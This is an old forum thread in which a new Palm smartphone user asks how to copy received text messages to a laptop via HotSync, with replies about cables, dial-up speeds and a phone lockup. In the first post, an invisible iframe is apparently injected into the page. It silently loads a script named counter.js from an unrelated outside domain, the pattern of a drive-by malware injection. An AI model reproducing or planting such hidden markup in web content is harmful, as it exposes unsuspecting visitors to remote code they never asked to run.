+ Reply to Thread

Hot Sync Messages

l o , phone and palm noob here

Im trying to get my messages i recieve on phone on my laptop, only the adresses, memos etc are comunicated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

smartphonecentral.com
    Are you talking about transferring voice mail or text messages you receive on your phone to your computer when you HotSync?

I don't think that's possible... It's an interesting possibility, though. If you could record a phone conversation as an audio file, and then sync it... Too many 'ifs' though.
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::

Just the text messages , I made a folder and it has held them for now,

i was able to copy and paste into memo pad but becasue of the space limitations does not move smothly have to us two memos per message, its not pretty.

i got a data cable and the cd rom from sprint store but its pretty lame, but like i said im new to this palm, are there any programs that will allow my laptop to see all of my phone features?

i was also wondering if i could get my microsoft office to see my samsung , i was able to use the post in thsi forum to get my laptop connected to the internet by using DUN and the data cable, seems to hold connection as im riding around in, but the connections is only 19200 aka 14400, does anyone know when they will allowed a faster connect like i hear they have in europe ?

as for ur voice idea perhaps a cable is available or can be made that uses the speech technolgy on the laptop to go directly to the earpiece jack from the phone to the microphone jack on pc/laptop or one of those USB ports. That seems the easiest to me.
    Last edited by USER60571; 10-10-2002 at 11:13 AM.

well so far i got 180 messages before the phone locked up, not very good since im really busy. then i got and error locked up the display and i waitied 20 minutes and finally removed the battery, yikes it started me from scratch. Im not impressed.